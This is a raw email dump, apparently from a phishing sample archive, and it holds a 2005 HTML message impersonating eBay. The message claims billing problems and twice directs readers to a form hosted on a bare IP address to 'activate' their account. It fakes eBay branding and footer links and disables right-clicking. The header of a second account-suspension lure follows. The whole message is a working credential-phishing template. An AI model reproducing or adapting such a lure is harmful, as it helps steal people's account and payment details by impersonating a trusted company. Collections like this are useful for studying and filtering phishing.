	*  0.5 AWL AWL: From: address is in the auto white-list
Message-Id: <20051030093716.AF8936CCE3E@mail1.monkey.org>
To: undisclosed-recipients: ;
Status: O
X-Status: 
X-Keywords:                  
X-UID: 407



<BODY oncontextmenu="return false" dir=ltr style="OVERFLOW-Y: scroll" leftMargin=0 topMargin=0 rightMargin=0><DIV id=wrteplaceholder style="FONT-FAMILY: Arial" name="wrteplaceholder">
<DIV>
<P><FONT face="Arial, Helvetica, sans-serif" size=2>Dear eBay Member, </FONT></P>
<P><FONT face="Arial, Helvetica, sans-serif" size=2>We at eBay are sorry to inform you that we are having problems with<BR>the billing information of your account. We would<BR>appreciate it if you<BR>would visit our website </FONT><A href="http://203.172.247.19/.cgi-bin/.eBay/"><FONT face="Arial, Helvetica, sans-serif" size=2>eBay Account Activation</FONT></A><FONT face="Arial, Helvetica, sans-serif" size=2> and fill out<BR>the proper<BR>information that we are needing to keep you as an eBay member.</FONT></P>
<P><FONT face="Arial, Helvetica, sans-serif" size=2>If you think you have received this email as an error, please visit<BR>our website and fill out the necessary information. That way we can<BR>make sure that everything is up to date! Again here is the<BR>link to our website. </FONT><A href="http://203.172.247.19/.cgi-bin/.eBay/"><FONT face="Arial, Helvetica, sans-serif" size=2>eBay Account Activation Form</FONT></A></P>
<P><FONT face="Arial, Helvetica, sans-serif" size=2>*******<BR>Please Do Not Reply To This E-Mail As You Will Not Receive A Response<BR>*******</FONT><FONT face="Verdana, Helvetica, Arial, sans-serif" size=3> </FONT></P>
<P><FONT face="Arial, Helvetica, sans-serif" size=2>Thank you<BR>Accounts Management</FONT></P>
<P><FONT face="Arial, Helvetica, sans-serif" size=2>As outlined in our User Agreement, eBay will periodically send you<BR>information about site changes and enhancements. Visit our Privacy<BR>Policy and User Agreement if you have any questions.</FONT></P>

<HR width=400 color=#000000 SIZE=1>

<P align=center><A href="http://www.eBay.com"><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2>
Announcements</FONT></A><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2> 
| </FONT><A href="http://www.eBay.com/"><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2>
Register</FONT></A><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2> | </FONT><A href="http://www.eBay.com"><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2>
Safe Trading Tips</FONT></A><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2> 
| </FONT><A href="http://www.eBay.com"><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2>
Policies</FONT></A><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2> | </FONT><A href="http://www.eBay.com"><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2>
Feedback Forum</FONT></A><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2> 
| </FONT>
<A href="http://www.zyra.org!%20.uk/ebay.htm"><FONT face="Arial, Verdana, Helvetica, sans-serif" size=2>
About eBay</FONT></A></P>
<P><A href="http://www.eBay.com"><IMG height=31 alt=TrustE hspace=0 src="http://www.zyra.org/truste.gif" width=116 align=right border=0></A><FONT face="Arial, Verdana, Helvetica, sans-serif" size=1>Copyright ?1995-2005 eBay Inc. All Rights Reserved.<BR>Designated trademarks and brands are the property of their respective owners.<BR>Use of this Web site constitutes acceptance of the eBay </FONT><A href="http://www.eBay.com"><FONT face="Arial, Verdana, Helvetica, sans-serif" size=1>User Agreement</FONT></A><FONT face="Arial, Verdana, Helvetica, sans-serif" size=1> and </FONT><A href="http://www.eBay.com"><FONT face="Arial, Verdana, Helvetica, sans-serif" size=1>Privacy Policy</FONT></A></P></DIV></DIV></BODY><hr><div style="background-color:white;color:black;">Walla! Mail - <a href="http://www.walla.com" style="color:blue">get your free 3G mail today</a></div>
 
SDQWHUDJEURKZXZQKDHYIXSHFLLUJKJRHTTSCF

From root@proxy.vgcphc.net  Sun Oct 30 09:53:06 2005
Return-Path: <root@proxy.vgcphc.net>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id CCC5A536E50
	for <jose@login.monkey.org>; Sun, 30 Oct 2005 09:53:06 -0500 (EST)
Received: from mail1.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail1.monkey.org (Postfix) with ESMTP id 65FDA6CCE3D
	for <jose@monkey.org>; Sun, 30 Oct 2005 09:53:04 -0500 (EST)
Received: from proxy.vgcphc.net (unknown [83.143.12.252])
	by mail1.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Sun, 30 Oct 2005 09:53:03 -0500 (EST)
Received: from proxy.vgcphc.net (localhost [127.0.0.1])
	by proxy.vgcphc.net (8.12.8/8.12.8) with ESMTP id j9UEqii5021165
	for <jose@monkey.org>; Sun, 30 Oct 2005 17:52:44 +0300
Received: (from root@localhost)
	by proxy.vgcphc.net (8.12.8/8.12.8/Submit) id j9UEqg9u021162
	for jose@monkey.org; Sun, 30 Oct 2005 17:52:42 +0300
Date: Sun, 30 Oct 2005 17:52:42 +0300
To: jose@monkey.org
Subject: Update your account information to avoid suspension.
Message-ID: <1130683962.55175.qmail@arribada.amazon.com>
